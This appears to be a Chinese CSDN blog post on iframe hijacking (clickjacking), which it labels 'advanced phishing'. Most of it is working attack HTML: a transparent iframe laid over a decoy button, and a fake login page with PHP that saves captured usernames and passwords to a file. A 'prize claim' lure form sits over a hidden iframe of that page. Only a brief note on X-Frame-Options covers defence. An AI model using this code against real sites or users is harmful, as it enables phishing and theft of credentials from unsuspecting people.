iframe劫持

最新推荐文章于 2024-08-09 14:00:00 发布
最新推荐文章于 2024-08-09 14:00:00 发布
阅读量1k 收藏
点赞数
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/109479897
版权

攻击方法

作用:钓鱼进阶

iframe伪造源码

伪造①


<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
<title>点劫持POC</title>
<style>
iframe { width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; -moz-opacity: 0; opacity: 0; filter: alpha(opacity=0); }
button { position: absolute; top: 250px; left: 770px; z-index: 1; width: 80px; height:20px; }
</style>
</head>
<body>
<button>脱掉衣服</button>
<img src="https://recomm.cnblogs.com/images/logo.png">

<iframe src="https://www.baidu.com/" scrolling="no"></iframe>#使用 iframe 嵌入被劫持的页面 
</body>
</html>

伪造方法②

1.构造login.php

<html>
 <head></head>
 <body>
  <form action="login.php" method="post"> 
   <fieldset> 
    <legend>用户登录</legend> 
    <ul> 
     <li> <label>用户名:</label> <input type="text" name="username" /> </li> 
     <li> <label>密 码:</label> <input type="password" name="password" /> </li> 
     <li> <label> </label> <input type="submit" name="login" value="登录" /> </li> 
    </ul> 
   </fieldset>
  </form>
  <!--?php
//简单处理  header('Content-type:text/html; charset=utf-8');   // 处理用户登录信息  if (isset($_POST['login'])) {    # 接收用户的登录信息    $username = trim($_POST['username']);    $password = trim($_POST['password']);    // 判断提交的登录信息    if (($username != '') || ($password != '')) {            $myfile = fopen("newfile.txt","w");            $txt = $username."    ".$password;            fwrite($myfile,$txt);            fclose($myfile);        }  }?-->
 </body>
</html>

2.构造iframe进行劫持(改opacity进行调整是否覆盖页面)

<html>
 <head></head>
 <body>
  <style>iframe{ width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; opacity: 0; }</style> 
  <form action="/" method="post"> 
   <fieldset> 
    <legend>中奖礼品领取,请先输入账号密码确认身份</legend> 
    <ul> 
     <li> <label>用户名:</label> <input type="text" name="username" /> </li> 
     <li> <label>密 码:</label> <input type="password" name="password" /> </li> 
     <li> <label> </label> <input type="submit" name="login" value="确认身份" /> </li> 
    </ul> 
   </fieldset>
  </form>
  <iframe src="http://127.0.0.1/login.php"></iframe>
 </body>
</html>

防御方法

①服务器

DENY:浏览器会拒绝当前页面加载任何frame页面

SAMEORIGIN:frame页面的地址只能为同源域名下的页面

ALLOW-FROM origin:允许frame加载的页面地址
#php中设置
header("X-FRAME-OPTIONS:DENY");

②客户端
防止script弹出实现

goddemon
关注
专栏目录
X-Frame-Options(点击劫持) 网页劫持漏洞
隔壁老瓦的专栏
06-28 3681
漏洞描述: 点击劫持(ClickJacking)是一种视觉上的欺骗手段。攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。 HTTP响应头信息中的X-Frame-Options,可以指示浏览器是否应该加载一个iframe中的页面。如果服务器响应头信息中没有X-Frame-Options,则该网站存在ClickJacking攻击风险。网
点击劫持iframe覆盖 学习笔记
Yoo_666的博客
07-25 1241
文章目录点击劫持分类iframe覆盖原理相关技术运用结合CSRF结合XSS示例代码防御方法X-FRAME-OPTIONS机制使用 FrameBusting 代码使用认证码认证用户 点击劫持 点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段 分类 iframe覆盖 图片覆盖 iframe覆盖 原理 攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击
网站常见漏洞(二)
最新发布
we_solo的博客
08-09 815
(超文本传输)协议定义的一种协议调试方法,该方法使得服务器原样返回任何客户端请求的内容(可能会附加路由中间的代理服务器的信息),由于该方法原样返回客户端提交的任意数据,因此,可用来进行跨站脚本(即使网站对关键页面启用了HttpOnly头标记,攻击者也可以通过TRACE方法绕过进行XSS攻击,盗取会话cookie、获取账户、模拟其他用户身份,甚至可以修改网页呈现给其他用户的内容。,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的。)攻击,这种攻击方式又称为跨站跟踪攻击(
ARP 缓存污染和IFRAME嵌入攻击
07-27 6923
最近收到了一位IT行业朋友的来信,说他遇到了这么一个现象,百思不得其解。 我昨天遇到了一个非常郁闷的问题,我们公司有一个部门的PC只要打开IE赛门铁克就会就会提示我中毒,下面是中毒的日志:Scan type: Auto-Protect ScanEvent: Security Risk Found!Threat: Trojan.Exploit.131File: C:/
基于iframe的CFS(Cross Frame Script)和Clickjacking(点击劫持)攻击
虚怀若谷
12-31 6440
攻击原理:    CFS攻击(Cross Frame Script(跨框架脚本)攻击)是利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码中加入scirpt,监视、盗取用户输入。    Clickjacking(点击劫持) 则是是一种视觉欺骗手段,在web端就是iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置。    CFS 和 C
iframe安全威胁
nzf_001的专栏nzf_001的专栏nzf_001的专栏nzf_001的专栏nzf_001的专栏
06-06 917
Web应用程序的安全始终是一个重要的议题,因为网站是恶意攻击者的第一目标。黑客利用网站来传播他们的恶意软件、蠕虫、垃圾邮件及其它等等。OWASP概括了Web应用程序中最具危险的安全漏洞,但是仍在不断积极的发现可能出现的新的弱点以及新的web攻击手段。 黑客总是在不断寻找新的方法欺骗用户,因此从渗透测试的角度来看,一个网络管理员需要照看到每一个可能被利用来入侵的漏洞和弱点。现在有许多自动化工具和
Iframe框架钓鱼攻击
m0_62425768的博客
11-19 550
Iframe框架钓鱼网站是指那些假扮成合法网站的虚假网站,旨在诱骗用户提供个人信息、账号密码、财务信息等敏感信息。这些网站通常会模仿知名的银行、电子支付平台、电子邮件服务提供商等机构的网站,以迷惑用户并诱使他们输入敏感信息。原理是,使用正则表达式来判断前端传过来的值是否正常,如不正常则不允以应答,如正常则向前端返回前端Iframe标签中的值。当前端传过来的值为InN时,执行doYInframe方法,可防护Iframe框架钓鱼的后端代码。在访问银行、支付平台等网站时,确保网址正确,使用书签或手动输入网址。
禁止iframe页面的所有js脚本如alert及弹出窗口等
10-25
不同浏览器对于iframe的处理略有不同,且存在一些已知的安全问题,如点击劫持攻击,开发者需要采取措施防范。 - 对于非同源的iframe,如果要完全控制其行为,可能需要与iframe内容提供方协商,加入相应的CORS策略。 ...
iframeable:检查网站是否可以安全抵御 iframe 和点击劫持攻击
06-06
检查网站是否可以安全抵御 iframe 和点击劫持攻击 npm install -g iframeable iframeable // example iframeable http://github.com http://github.com denies being iframed, safe 此实用程序检查网站是否以 x-...
HTML中iFrame标签的两个用法介绍
09-28
例如,使用iFrame加载第三方内容时可能引入安全漏洞,如点击劫持等。同时,过多的iFrame嵌入也会增加页面的复杂度和渲染负担,影响页面加载速度和性能。 总结而言,iFrame标签在HTML页面中扮演了重要的角色,不仅...
js实现防止被iframe的方法
10-23
这通常被称为“反劫持”技术,其目的在于防止恶意网站使用iframe加载你的页面内容,并以此进行钓鱼等欺诈活动。在网站安全日益重要的今天,掌握这种技术对于保护用户数据和提升用户体验变得至关重要。 文章所描述的...
Iframe框架钓鱼攻击_iframe攻击原理
2301_78416732的博客
04-11 1092
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
iframe注入和非法重定向
m0_48520508的博客
07-16 1930
iFrame注入是一种非常常见的跨站点脚本(或XSS)攻击。它由一个或多个iFrame标签组成,这些标签已插入页面或帖子的内容中,并且通常会下载可执行程序或执行其他危害网站访问者计算机的操作。在最佳情况下,Google可能将网站标记为“恶意”。最坏的情况是网站所有者和访问者最终都感染了恶意软件。 (1)iFram注入,当易受攻击的网页上的框架通过用户可控制的输入显示另一个网页时发生。 GET/search.jsp?query=%3Ciframe%20src=%22https://google.com/?%2
抵御网页攻击 快速解决iFrame漏洞问题
photon
12-14 880
当网站成为黑客热爱的攻击的目标,也成为散播恶意程序的跳板,企业蒙受的风险与损失随之扩大,也会让网站使用者受到波及。 目前Google开始在搜寻结果中加入提醒字符串,标示受骇的网站,对企业而言,更可能因此流失用户。 如何在这波「网骇/害」烽火中生存,最重要的是必须正视问题的严重性,在网站开发与维运阶段提升安全意识。另外,也可藉由导入自动化工具的方法提升安全性,如果资安预算有限,至少找出企业能负荷的安
表单劫持代码编写(后门可用)
xiaoHn000的博客
04-07 871
今天给大家分享一下自己写的表单劫持(可作后门等): <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>网站后台管理系统 </title> </head> <body> <form a...
点击劫持学习
qq_51558360的博客
02-18 415
什么是点击劫持 点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。 将iframe页面透明度调至最透明,将看不到iframe页面 但其实页面是这样的 在登录页面输入其实内容被输入到了iframe页面 代码 危害 1.盗取用户资金 2.获得用户的敏感信息 3.与XSS或CSRF等其他攻击手段
script、iframe注入型防运营商劫持
JUSTIN的博客
11-25 1121
(一)前言 准确是防运营商劫持就是防script、iframe注入型劫持,属于HTTP劫持中的一种。主要是劫持js文件,然后在网页中通过js脚本往网页中注入图片和链接或者框架广告,也叫流量劫持。 至于劫持类型,这里我建议,看这篇文章 (二) ...
web安全——点击劫持
2301_77472496的博客
08-29 272
点击劫持是一种视觉上的欺骗手段。攻击者一般使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击iframe页面的一些功能性按钮上。通过控制iframe的长、宽,以及调整top、left位置,可以把iframe页面内任意部分覆盖到任何地方。同时设置iframe的position为absolute,并将z-index的值设置为最大,以达到让iframe处于页面的最上层。
javascript表单劫持用户密码(后门免杀)
wodafa的博客
05-19 3235
试验开始 javascript表单劫持 其实应该可以留有很多后门,但是我暂时只想到这一种,还希望社区的大神能够完善这篇文章·~~~~ 原理:在正常的登陆页面,留下一段恶意JS代码,在登陆账号密码的同时,也会把账号密码悄悄的发送到我们的站点上~~~ test.html 正常页面 test2.php 用来验证账号密码数据的正常页面 test3.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值